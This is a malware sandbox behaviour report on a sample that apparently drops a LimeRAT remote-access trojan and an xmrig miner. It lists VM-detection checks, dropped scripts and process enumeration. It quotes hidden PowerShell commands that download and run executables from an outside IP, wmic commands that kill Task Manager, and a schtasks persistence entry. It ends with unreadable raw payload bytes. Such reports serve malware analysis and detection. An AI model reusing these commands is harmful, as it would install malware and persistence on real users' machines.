NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x648f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x648f2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00460000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00382000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00435000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00437000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0039c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0038a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:41 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00426000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:41 a.m.	process_identifier: 6792 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:41 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:41 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:41 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:41 a.m.	process_identifier: 6792 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (8 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW April 12, 2021, 10:40 a.m.	number_of_free_clusters: 3246578 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 12, 2021, 10:40 a.m.	number_of_free_clusters: 3246576 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 12, 2021, 10:40 a.m.	number_of_free_clusters: 3246576 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 12, 2021, 10:40 a.m.	number_of_free_clusters: 3246576 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 12, 2021, 10:40 a.m.	number_of_free_clusters: 3246576 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 12, 2021, 10:40 a.m.	number_of_free_clusters: 3246568 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 12, 2021, 10:40 a.m.	number_of_free_clusters: 3246578 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 12, 2021, 10:40 a.m.	number_of_free_clusters: 3246576 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1

Creates executable files on the filesystem (50 out of 292 events)

file	C:\Windows (x86)\KBDMLT48.DLL
file	C:\Windows (x86)\KBDBE.DLL
file	C:\Windows (x86)\KBDCZ1.DLL
file	C:\Windows (x86)\TRACERT.EXE
file	C:\Windows (x86)\KBDLT.DLL
file	C:\Users\test22\AppData\Local\Temp\updateW\nvidia7.bat
file	C:\Windows (x86)\KBDMYAN.DLL
file	C:\Windows (x86)\KBDAZST.DLL
file	C:\Windows (x86)\KBDNTL.DLL
file	C:\Windows (x86)\KBDA2.DLL
file	C:\Windows (x86)\KBDBENE.DLL
file	C:\Windows (x86)\icmp.dll
file	C:\Windows (x86)\KBDINDEV.DLL
file	C:\Windows (x86)\asferror.dll
file	C:\Windows (x86)\kbdgeoer.dll
file	C:\Windows (x86)\KBDPASH.DLL
file	C:\Windows (x86)\KBDBR.DLL
file	C:\Windows (x86)\tier2punctuations.dll
file	C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
file	C:\Users\test22\AppData\Local\Temp\updateW\update1.bat
file	C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat
file	C:\Windows (x86)\KBDMONST.DLL
file	C:\Windows (x86)\KBDHU.DLL
file	C:\Windows (x86)\KBDSMSFI.DLL
file	C:\Windows (x86)\KBDUKX.DLL
file	C:\Windows (x86)\kbdax2.dll
file	C:\Windows (x86)\KBDFR.DLL
file	C:\Windows (x86)\KBDYCC.DLL
file	C:\Windows (x86)\KBDINBE1.DLL
file	C:\Users\test22\AppData\Local\Temp\updateW\nvidia.vbs
file	C:\Windows (x86)\kbd101a.dll
file	C:\Windows (x86)\KBDTUF.DLL
file	C:\Windows (x86)\KBDBLR.DLL
file	C:\Windows (x86)\KBDTUQ.DLL
file	C:\Windows (x86)\KBDFTHRK.DLL
file	C:\Windows (x86)\KBDIBO.DLL
file	C:\Windows (x86)\kbd106.dll
file	C:\Windows (x86)\KBDLT2.DLL
file	C:\Windows (x86)\KBDTH3.DLL
file	C:\Windows (x86)\KBDIT142.DLL
file	C:\Users\test22\AppData\Local\Temp\updateW\nvidia10.bat
file	C:\Windows (x86)\KBDSL1.DLL
file	C:\Windows (x86)\KBDRU.DLL
file	C:\Windows (x86)\KBDUSL.DLL
file	C:\Windows (x86)\KBDJAV.DLL
file	C:\Windows (x86)\KBDMACST.DLL
file	C:\Windows (x86)\KBDUSX.DLL
file	C:\Windows (x86)\KBDDV.DLL
file	C:\Users\test22\AppData\Local\Temp\updateW\32a1.bat
file	C:\Windows (x86)\kbdgeoqw.dll

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\updateW\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk

Creates a suspicious process (12 events)

cmdline	PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com'
cmdline	wmic process where name='taskmgr.exe' delete
cmdline	wmic process where name='xmrig.exe' delete
cmdline	C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe
cmdline	PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com'
cmdline	schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe'"
cmdline	wmic process where name='Taskmgr.exe' delete
cmdline	"C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe"
cmdline	wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
cmdline	"C:\Users\test22\AppData\Local\Temp\updateW\svchost.exe"
cmdline	"C:\ProgramData\svchost.exe"
cmdline	C:\ProgramData\svchost.exe

Drops a binary and executes it (13 events)

file	C:\Users\test22\AppData\Local\Temp\updateW\java.vbs
file	C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat
file	C:\Users\test22\AppData\Local\Temp\updateW\upd3.vbs
file	C:\Users\test22\AppData\Local\Temp\updateW\1234.bat
file	C:\Users\test22\AppData\Local\Temp\updateW\1a2.vbs
file	C:\Users\test22\AppData\Local\Temp\updateW\z.vbs
file	C:\Users\test22\AppData\Local\Temp\updateW\helps.vbs
file	C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
file	C:\Users\test22\AppData\Local\Temp\updateW\svchost.exe
file	C:\Users\test22\AppData\Local\Temp\updateW\csrss.exe
file	C:\Users\test22\AppData\Local\Temp\updateW\win.com
file	C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
file	C:\Windows (x86)\explorer.exe

Drops an executable to the user AppData folder (4 events)

file	C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
file	C:\Users\test22\AppData\Local\Temp\updateW\win.com
file	C:\Users\test22\AppData\Local\Temp\updateW\svchost.exe
file	C:\Users\test22\AppData\Local\Temp\updateW\csrss.exe

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
ShellExecuteExW April 12, 2021, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat	1	1
ShellExecuteExW April 12, 2021, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\updateW\1234.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\updateW\1234.bat	1	1
ShellExecuteExW April 12, 2021, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat	1	1
CreateProcessInternalW April 12, 2021, 10:40 a.m.	thread_identifier: 5652 thread_handle: 0x00000088 process_identifier: 4560 current_directory: C:\Users\test22\AppData\Local\Temp\updateW filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW April 12, 2021, 10:41 a.m.	thread_identifier: 2380 thread_handle: 0x00000084 process_identifier: 1844 current_directory: C:\Users\test22\AppData\Local\Temp\updateW filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (36 events)

Time & API	Arguments	Status	Return
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: pw.exe process_identifier: 4360	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: taskhost.exe process_identifier: 5608	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: WmiPrvSE.exe process_identifier: 4452	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: cmd.exe process_identifier: 5996	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: conhost.exe process_identifier: 3596	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: wscript.exe process_identifier: 6120	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: wscript.exe process_identifier: 1808	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: PING.EXE process_identifier: 4568	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: explorer.exe process_identifier: 4156	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: conhost.exe process_identifier: 200	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: svchost.exe process_identifier: 2620	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: taskhost.exe process_identifier: 5208	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000228 process_name: svchost.exe process_identifier: 7848	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000248 process_name: cmd.exe process_identifier: 4028	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000248 process_name: conhost.exe process_identifier: 4328	1	1
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000248 process_name: pw.exe process_identifier: 5856	1	1
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000254 process_name: netsh.exe process_identifier: 7080	1	1
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000258 process_name: conhost.exe process_identifier: 3196	1	1
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000280 process_name: cmd.exe process_identifier: 6404	1	1
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000280 process_name: conhost.exe process_identifier: 6936	1	1
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000280 process_name: pw.exe process_identifier: 5756	1	1
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002dc process_name: cmd.exe process_identifier: 8536	1	1
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002dc process_name: conhost.exe process_identifier: 8460	1	1
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002dc process_name: pw.exe process_identifier: 2192	1	1
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000318 process_name: cmd.exe process_identifier: 2876	1	1
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000318 process_name: conhost.exe process_identifier: 7556	1	1
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x000000000000031c process_name: pw.exe process_identifier: 6700	1	1
Process32NextW April 12, 2021, 10:35 a.m.	snapshot_handle: 0x0000000000000340 process_name: cmd.exe process_identifier: 5896	1	1
Process32NextW April 12, 2021, 10:35 a.m.	snapshot_handle: 0x0000000000000340 process_name: conhost.exe process_identifier: 6000	1	1
Process32NextW April 12, 2021, 10:35 a.m.	snapshot_handle: 0x0000000000000340 process_name: pw.exe process_identifier: 8252	1	1
Process32NextW April 12, 2021, 10:35 a.m.	snapshot_handle: 0x0000000000000380 process_name: cmd.exe process_identifier: 7792	1	1
Process32NextW April 12, 2021, 10:35 a.m.	snapshot_handle: 0x0000000000000380 process_name: conhost.exe process_identifier: 4204	1	1
Process32NextW April 12, 2021, 10:35 a.m.	snapshot_handle: 0x0000000000000380 process_name: pw.exe process_identifier: 4676	1	1
Process32NextW April 12, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000003b8 process_name: cmd.exe process_identifier: 6216	1	1
Process32NextW April 12, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000003b8 process_name: conhost.exe process_identifier: 8916	1	1
Process32NextW April 12, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000003b8 process_name: pw.exe process_identifier: 8484	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 12, 2021, 10:40 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (6 events)

Data received	pÿ0è¨ïÄÀyÈÿ]ÃD$Pjÿt$ÿt$ÿt$è»ÿÿÿÄÃL$èÂSUÙ½VWs{ë&=XD\|þrj@Wÿ3èý+õ;õsÖ_^][Ãì¼$ÀSUVø´$ÐWjY¼$ÇD$rón<ó¥²ô\|$LjYó¥0¹gæ jxöRQü÷h\$dL$(¹®g»L$0@ò«ÙL$\5Íà[D$D3íD$hD$<D$`D$D$XD$,D$TD$8D$PD$ D$Ll$l$Hl$DD$D$ÇD$$:õO¥\$@L$4¶0CÁL$ÈD$(L$3Ît$4ÁÁÁ3ðD$(D$ÁÎt$4¶1CÆt$ðD$4t$3ñL$(ÁÎÎ3ÁL$(ÁÈD$4D$L$ ¶2CD$ÈD$0L$ 3Ï\|$ÁÁÁ3øD$0D$ÁÏ\|$¶3CÇ\|$ øD$\|$ 3ùL$0ÁÏÏ3ÁL$0ÁÈD$D$¶4CÃ\$8ØD$Ë3ÊT$@ÁÁÁ3ÐD$D$ÁÊ¶5CÂØD$\$83ÙL$,ÁËÃ3ÐD$ÁÊT$@T$¶6CD$<ÈD$$L$,3Íl$<ÁÁÁ3èD$$¶7CT$,ÁÍÅÐD$$T$,3ÑL$ÁÊÂ3èD$$ÁÍl$<l$¶8CD$ÈD$L$3ÊT$ÁÁÁ3ÐD$¶9Cl$ÁÊÂèD$l$l$L3éL$ ÁÍÅ3ÐD$D$tD$ÁÊT$T$`¶:CT$@ÂÈL$ 3ÎD$$t$ ÁÁÁ3ÐD$$D$ÁÊ¶;CÂðD$$t$ t$P3ñL$8ÁÎÆ3ÐD$$D$xD$ÁÊT$@T$d¶<CT$<ÂÈD$(L$83Ï\|$8ÁÁÁ3ÐD$(D$ÁÊ¶=CÂøD$(\|$8\|$T3ùL$,ÁÏÇ3ÐD$(ÁÊT$<T$hT$D$l¶>CD$4ÈD$0L$,3Ë\$4ÁÁÁ3ØD$0¶?CT$,ÁËÃÐT$,T$X3ÑÁÊD$0Â3ØD$0D$pD$ÁËÀ\$4L$4\$\\$@D$=Püÿÿ$$Ð¬$l$Ht$\|¼$ôD,l3)3D,L)Åý rä_^][Ä¼ÂUìäðìxMVWôD$<( (hø)l$@)d$p(Efï«CHPp8fnÑfnÂfnÎfbÊfn÷fbðfbñfþôt$$pfþõfïÞ\|$,x(ûfrófr×L$Hfïû(ïT$ fþ-p«CP(ÅfïD$@(àfnÏfrÐfrôfnÒfïàfbÊfnÆfnÙfbØfbÙfþÞt$p0fþÜfïû)\$P(ß\|$(x8frófr×T$fïßL$(Ó\|$4fþÕfpÛ(Ât$0fïÄfpâN(ÈfrÐfrñfïÈfpé9P(H fn×x<fnÆp4fnÊfbÊfnùfbøfbùfþ\|$Pfþý\|$8x,fïß@$(ÃfrÐfró\|$fïÃ\|$8fnL$(ð)D$Pfþô(ÆfnØfïÅfn×(àfbÊfrÐfrôfïàfnÆfbØ(D$PfbÙfþßfn\|$4fþÜfïÃ)\$`(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÖfrÐfrñfïÈfnÀfbøfpéfnL$ fbÊfbùfþ\|$`fþýfïß(ÃfrófrÐfïÃ(ð)D$`fþô(ÆfïÅ(àfrÐfrôfnT$fïàfnÇfnÉfbÊfnÚfbØ(D$`fbÙfþßfn\|$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnD$fbøfpé9fnL$,fbÊfbùfþ\|$PfnT$(fþýfïßfnL$$(ÃfbÊfrÐfrófïÃfn\$0(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(Èfn×frñfrÐfïÈfnD$fpéfnL$0fn\|$fbøfbÊfbùfþ\|$PfþýfnL$,fïßfnÖ(ÃfbÊfrÐfrófïÃfnÙ(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$$fbØ(D$`fbÙfþßfnúfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâN(ÈfnÐfrÐfrñfïÈfnD$fbøfpé9fnL$(fbÊfbùfþ\|$PfnT$ fþýfnL$fïß(ÃfbÊfrÐfrófïÃfn\$4(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$fbØ(D$`fbÙfþßfþÜ)\$PfïÃfn\|$(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnÆfbøfpéfnL$(fbÊfbùfþ\|$PfnT$4fþýfïßfnL$(ÃfbÊfrÐfrófïÃfnØ(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$0fbØ(D$`fbÙfþßfn\|$$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâN(Èfn×frÐfrñfïÈfnD$ fpé9fnL$fbøfbÊfbùfþ\|$Pfþýfïß(ÃfrófrÐfïÃ)D$`(ðfn\$fþôfnÑ(ÆfnÊfïÅfbÊ(àfrÐfrôfïàfnD$,fbØ(D$`fbÙfþßfnøfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÒfrÐfrñfïÈfnD$$fbøfpéfnL$fbÊfbùfþ\|$PfnL$fþýfïßfn×(ÃfbÊfrÐfrófïÃfn\$,(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$ fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfþÖ(ÂfïÄ(ÈfrÐfrñfïÈfn\|$4fnD$fbøfp
Data received	é9fnL$fpâNfnT$(fbÊfbùfþ\|$PfpÛfþýfïßfnL$0(ÃfnÖfrÐfrófbÊfïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnÁfbØ(D$`fbÙfþßfn\|$$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÑfrÐfrñfïÈfnD$,fbøfpéfnL$fbÊfnT$(fbùfþ\|$PfþýfnÊfïß(ÃfrófrÐfïÃfn\$0(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$fbØ(D$`fbÊfbÙfþßfn\|$ fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnÇfbøfpé9fnL$fbÊfbùfþ\|$PfnL$fþýfïßfnÐ(ÃfbÊfrÐfrófïÃfnÞ(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$4fbØ(D$`fbÙfþßfn\|$0fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$ (ÈfrñfrÐfïÈfnD$4fpéfnL$fbøfbÊfbùfþ\|$PfþýfnÒfïßfnÏ(ÃfbÊfrÐfrófïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnÆfbØ(D$`fbÙfþßfn\|$,fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâN(ÈfnÑfrÐfrñfïÈfnÀfbøfpé9fnL$fbÊfbùfþ\|$PfnT$fþýfïßfnL$((ÃfbÊfrófrÐfïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$$fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfnþfþÖfpÛ9(ÂfïÄfpâNfnT$((ÈfrÐfrñfïÈfnD$0fbøfpéfnL$fbÊfbùfþ\|$PfþýfnL$4fïßfnÐ(ÃfbÊfrÐfrófïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$fbØ(D$`fbÙfþßfn\|$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâNfnT$$(ÈfrÐfrñfïÈfnÁfbøfpé9fnÏfbÊfbùfþ\|$Pfþýfïß(ÃfrófrÐfïÃ(ð)D$`fþô(ÆfïÅ(àfnL$ fn\$,frÐfrôfnÒfïàfbÊfnD$fbØ(D$`fbÙfþßfn\|$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$,(ÈfrÐfrñfïÈfnD$fbøfpéfnL$4fbÊfbùfþ\|$PfþýfnÑfïßfnÈ(ÃfbÊfrÐfrófïÃfnß(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$(fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâN(ÈfnÒfrñfrÐfïÈfpé9fnD$fn\|$0fbøfnÎfbÊfbùfþ\|$PfnT$fþýfïßfnL$(ÃfbÊfrÐfrófïÃfn\$$(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$ fbØ(D$`fbÙfþßfnúfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnD$fbøfpéfnÉfbÊfbùfþ\|$PfnT$fþýfnL$ fïß(ÃfbÊfrófrÐfïÃfn\$$(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$fbØfbÙfþßfþÜ(D$`fïÃ)\$P(ØfnÿfrÐfró_fïØ(ÓfpÛfþÖ(ÂfïÄfpâN(ÈfnÖfrÐfrñ^fïÈfnD$ fbøfpé9
